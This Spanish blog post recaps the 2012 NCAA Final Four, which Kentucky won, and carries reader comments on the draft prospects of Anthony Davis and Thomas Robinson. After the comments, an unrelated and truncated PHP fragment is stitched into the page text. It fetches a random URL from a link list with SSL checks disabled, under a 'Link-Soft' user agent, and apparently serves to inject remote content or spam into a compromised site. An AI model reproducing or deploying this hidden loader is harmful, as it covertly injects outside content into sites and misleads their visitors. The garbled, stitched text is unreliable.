Resumen Final four NCAA 2012

03 de April de 2012 por Hynreck

Éste fin de semana se celebraba uno de los eventos deportivos más esperados y que más pasión despiertan del año. La Final Four de la NCAA es un acontecimiento que crea gran expectación entre los aficionados,  ansiosos de contemplar a las estrellas del futuro.

A la misma llegaban por un lado los grandes favoritos, los Wildcats de Kentucky de Calipari, y los Cardinals de Louisville de Pittino. Gran rivalidad tanto en la grada, dada la proximidad entre ambas universidades, como en los banquillos debido a las relaciones actuales entre ambos entrenadores que un día fueron mentor y pupilo.

La primera parte comenzó con una Kentucky arrolladora, Marquis Teague superaba con facilidad a Payton Siva, mientras que Giorgi Dieng se veía incapaz contra Anthony Davis que ha ganado muchos números para ser Nº 1 del draft.

Pittino ajustó la defensa y de la mano del imprevisible Russ Smith conseguía acercarse a 3 puntos a 1:30 para el descanso.

El segundo tiempo comenzaba con otro arreón de los Wildcats. De nuevo Anthony Davis demostraba su superioridad bajo los tableros y la distancia llegaba a los 13 puntos en el minuto 24 (32-45). El partido parecía decidido, pero Peyton Siva que había estado desafortunado en la primera parte y Chane Behanan, unidos al pajarón de Kentucky que en 7 minutos únicamente anotó 3 puntos, conseguían igualar el marcador (49-49 min 31).

Todo parecía en el aire, pero un parcial de 11-2 liderado por Kidd-Gilchrist y Darius Miller sentenciaría el partido. A falta de un minuto Louisville conseguiría de nuevo acercarse a 5 puntos, pero finalmente los chicos de Calipari jugarían la final.

Por el otro lado llegaban Ohio St. y Kansas llevándose éstos últimos el gato al agua. Los Jayhawks, campeones en 2008 con Mario Chalmers y Brandon Rush, y liderados por Thomas Robinson y el inconsistente Tyshawn Taylor superaron en un apretado partido a los Buckeyes de un desafortunado Jared Sullinger tras una sensacional remontada.

Salía Ohio St. con ganas en la primera parte llegando a alcanzar 13 puntos de ventaja a falta de 6 minutos para el descanso (26-13). Poco a poco reaccionó Kansas, con un gran Thomas Robinson llegando con una desventaja de 9 puntos al descanso (34-25).

Tras la reanudación, y puntito a puntito, la ventaja se seguía reduciendo, Thomas Robinson anotaba al ritmo que Sullinger fallaba, hasta que a falta de 3 minutos 2 tiros libres de Travis Releford culminaban la remontada. A falta de 10 segundos y con Kansas 3 arriba, Deshaun Thomas erraba 2 triples seguidos que hubiesen empatado el partido, rebote ofensivo de Buford que anota dejando a su equipo a 1. Dos tiros libres posteriores de Tyshawn Taylor sentenciaban la semifinal.

Ya en la final anoche hubo poca historia pese a la tardía reacción de Kansas. Un extraordinario Doron Lamb compensó el desacierto ofensivo de Anthony Davis quien sólo anotó una canasta en juego.

El partido comenzó igualado, sin embargo los chicos de Calipari tomaron una ligera ventaja en el minuto 5 de partido, sería la última alternativa en el marcador demostrando la superioridad de Kentucky respecto a Kansas.

De la mano principalmente de Kidd-Gilchrist y de Doron Lamb, los Wildcats ampliaron el marcador hasta llegar a una máxima de 18 puntos (23-41 min 19). Únicamente Tyshawn Taylor y un inconmensurable Thomas Robinson (18 puntos y 17 rebotes) respondían por los Jayhawks .

En la segunda parte Kentucky nadaba y guardaba la ropa administrando cómodamente la ventaja obtenida. Un último arreón de Kansas apretó el marcador a falta de un minuto (57-62). Sin embargo nunca llegó a peligrar realmente el partido para Kentucky.

Al final 59-67. Primer título para Calipari y su peculiar versión de preparación universitaria (One and Done, ya saben) de cara al salto a la NBA que tendrá más adeptos entre los mejores jugadores de High-School los próximos años.

Comenta

13 comentarios a esta entrada

  1. Esteban dice:
    #1

    thomas robinson tiene un poder de gol asombroso, pero en la nba le faltara tamaño ya qu eneocntrara ginantes como los de ayer que le haran fallar

    davis parece un bestia, a este nivel no tiene comparacion, bajo todos los rebotes del partido en la primera mitad, creo que fueron 13, y ademas 5 tapones, todo eso en 20 minutos, luego se canso como es obvio, pero sus numeros fueron infernales. Para la nba le falta aun, no tiene el minimo movimiento ofensivo, nisiquiera en el mano a mano con alguien de talla puede irse bajo el cesto y volcarla, sino que se limita a tirar ganchos de dudosa calidad y menor efectividad, le faltan kilos y creo que son esos fisicos que no puedes hacer engordad facilmente
    por otro lado es muy coordinado, tiene una gran mecanica de tiro que si pule podria tener un arma de 4 o 5 metros (ayer anotos u unico tiro desde esa distancia) y es muy bueno tirando libres

    a ver, sin duda que le espera una gran carrera NBA, ayer comparaban sus numeros con los de ewing, y davis parecia chamberlian, pero aun asi dudo que puede convertirse en un jugador tan dominante, por fisico y caracteristicas lo veo muy pareceido a marcus camby, y creo que hara una carrera como el, a ver, un centro titular 14 años seguidos en la nba, enorme tapodanor y rebotere y aceptable en ataque, pero nada de all.star y mejor quinteto de la nba

    asi lo veo yo

      Citar

  2. melo15 dice:
    #2

    Pues yo creo que Davis sis sera all-star, es muy rapido para ser un interior, ademas tiene un buen juego en el pste y defensivamente solo ha de sumar unos quantos quilos, vamos que se va de farra con Eddy Curry y problema resuelto!
    Esteban Thomas Robinson, mide 2’08, esta perfecto para un ala-pivot de sus cualidades.

      Citar

  3. Esteban dice:
    #3

    melo15, debo contarte un secreto, las paginas y internet, la nba y la ncaa mienten, robinson no mide 2.08 como tampoco griffin mide 2.08

    si robinson midiera 2.08, desp de verlo al lado de davis, diria que este ultimo mide 2.20

    y ayer vi clippers vs mavs, si griffin mide 2.08, al verlo al lado de dirk, el aleman deberia medir 2.25

      Citar

  4. melo15 dice:
    #4

    Bueno, pues si todos los ala-pivots miden menos problema resuelto!

      Citar

  5. Ru dice:
    #5

    Está claro que en los deberes de Anthony Davis debe estar ganar musculatura para su paso a profesionales,eso y ganar en movimientos en el poste y afianzarse en ese tirito de media distancia porque de momento cuando se las tope con jugadores mucho más fuertes como Jordan,Howard…no va a poder asegurarse canastas fáciles.Yo ahora mismo a largo plazo lo veo una especie de Camby(como dice Esteban),Noah o Tyson Chandler.Creo que no será jugador franquicia de un equipo pero si ese factor X que cambia a un equipo a ganador,vease el ejemplo de Ricky en los Wolves.

    Me reitero en lo de Thomas Robinson…para mí no es tal el problema de altura,últimamente estamos acostumbrados a encontrarnos con AP “undersized”.Bien,creo que este tipo de jugadores ha evolucionado a eso y cada vez más veremos cosas así,creo que hay que cambiar el chip respecto a que los AP te midan lo de Gasol y esa especie.

    Por cierto he leido que igual Sullinger sigue otro año en Ohio State porque quiere ganar el campeonato.Yo creoo que se presentará al draft,pero viendo que la temporada pasada era TOP 5 y en esta lo ponen rondando la décima posición…en el sentido económico cagada.

      Citar

  6. Esteban dice:
    #6

    Una cagada a medias ru, piensa q ya se perdio el salario de este año, otro año mas sin salario deberia ser numero uno para compensarlo

    Me da miedo creer q davis podria terminar en los bobcats, un equipo q sera nada de nada los proximos dos años, seria un enorme desperdicio y podria frustrarlo, algo parecido a lo de brown en los pesimos wizars de jordan

    Ojala tenga suerte y caiga en otro equipo, donde pueda ser un facotr, podrian ser los nets q si llegan al uno mantendrian su seleccion y creo q deron se quedaria para jugar con el, lopez y wallace, dando un salto de calidad, seria un golpe de suerte para el propio davis

    Otro q andaria con chamces serian los hornets q podrian hacerse con el uno, y con la seleccion de los wolves podria ser la decima y quiza llegue hasta ahí sullinger, mas la renovacion de gordon y piezas complementarias como ariza, vazquez, jack y hasta quiza el propio okafor

    En fin cualquiera menos los bobcats

      Citar

  7. melo15 dice:
    #7

    Pero es que Davis no es pivot, mirad a Garnett tampoco pesa 130 quilos, es de composicion delgada, ademas Davis aun se esta desarrolando, os recuerdo que hace nada era un guard, de ahi viene su velocidad y manejo de balon, superior a la de todos los interiores y que le hacen un gran penetrador.
    Sobre Thomas Robinson, Griffin tampoco llega al 2’08, ni Malone ni Brakley ni Elvin Hayes asi que no hay problema.
    Ru, no creo que Sullinger la haiga cagado, esta temporada le ha servido para desarrolar un tiro de media distancia bastante efectivo y ha empezado a tirar de tres, como sabreis Sullinger no se destaca por su rapidez ni explosividad, asi que estos recursos le van a venir de p… madre

      Citar

  8. kantonyo dice:
    #8

    Gran torneo el que hemos visto este año, creo que pinta bien el próximo Draft.

    Anthony Davis para mí, va a ser una de las referencias de los próximos años en la NBA, si todo transcurre con normalidad. Su progresión hasta el momento parece infinita y sus cualidades atléticas son inmejorables para este deporte. Ayer tuvo problemas con la anotación, pero no por ello hay que compararle con un Camby, yo no lo veo así, para nada. Su mejor versión puede ser Kevin Garnett, pena de esos cms de menos.

    Thomas Robinson, es verdad que le falta altura, pero yo le veo del estilo de Cousins, Favors, Monroe, Blair, creo que están triunfando a pesar de no superar los 7 pies. Son jugadores muy fuertes, que acaban imponiéndose debajo del tablero, y será un jugador de clase media-alta de la liga. A Sullinger también le incluyo en este tipo de jugadores, pero Jared tiene más talento y como dice melo15 ha aprendido a jugar fuera de la zona.

      Citar

  9. melo15 dice:
    #9

    Kantoyo, estoy de acuerdo en todo menos en una cosa, que Favors esta triunfando, es esperar muy poco de un tio con esas cualidades fisicas. De los mas decepcionantes con Turner del Draft 2010.
    Pd:No os olvideis que Davis aun le pueden quedar algunos centimetros por crecer. Tan importante son 3 o 4 cm, no es nada, no creo que puedas sacra tanta ventaja porque tu midas 2’08 y el otro 2’06

      Citar

  10. Esteban dice:
    #10

    Melo los dos centimetros no parecen nada, pero influye como tanb la longitud. De brazos

    Fijate ayer nomas cauntos tiros ni pego al aro robinson cuando se enfrento a davis

    En cuanto davis, puede q su progresion no tenga fin, y q tenga un enorme margen de mejora pero llega a la nba con un unico recurso ofensivo, volcadas, atraves de alley ups o desp de pases q lo dejen solo, los mismos recursos de deandre jordan, y tira libres de forma aceptable

    Puede llegar a ser garnet? Condiciones fisicas tiene, pero debe mejorar practicamentre todo su juego

    Esta cerca de jugar como garnett? En absoiluto, solo hace parecido meter tapas

      Citar

  11. melo15 dice:
    #11

    Pues no coincido Esteban, Davis tiene un buen gancho y como has dicho tiene una buena mecanica de tiro, a apartemuy buen reboteador, y defiende el perimetro perfectamente, con lo que no sufrira mucho en los Pick&Rolls.
    Ademas tiene todo el verano para practicar el tiro de media distancia.

      Citar

  12. Juan_Taf13 dice:
    #12

    FEAR THE UNIBROOOOOOOOOW!!!!!!!!!!

      Citar

  13. melo15 dice:
    #13

    Que?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>